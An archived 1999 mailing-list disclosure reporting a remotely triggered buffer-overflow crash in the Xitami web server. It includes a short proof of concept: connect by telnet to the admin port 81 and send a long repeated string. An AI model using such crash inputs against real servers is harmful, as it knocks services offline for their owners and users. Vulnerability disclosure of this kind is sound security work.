Archive : 1999 : november : xitami - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
Xitami Web Servers



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Сб, 30 окт 1999  09:57:22

   От: Meliksah Ozoral <mozoral@SUPERONLINE.COM>

 Кому: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

 Тема: Xitami Web Servers

--------------------------------------------------------------------------------




Hi, I found a bug on Xitami web server. I tested it on v2.4c3 it worked very well. Xitami DoS is a remotely exploitable buffer overflow. Xitami open port 81 for admin config program. You can crash server by sending huge packets on port 81. For Example : 



telnet localhost 81



#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

#FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#



Xitami Crashed







Meliksah OZORAL

Istanbul Bilgi University

mozoral@superonline.com

http://members.xoom.com/mozoral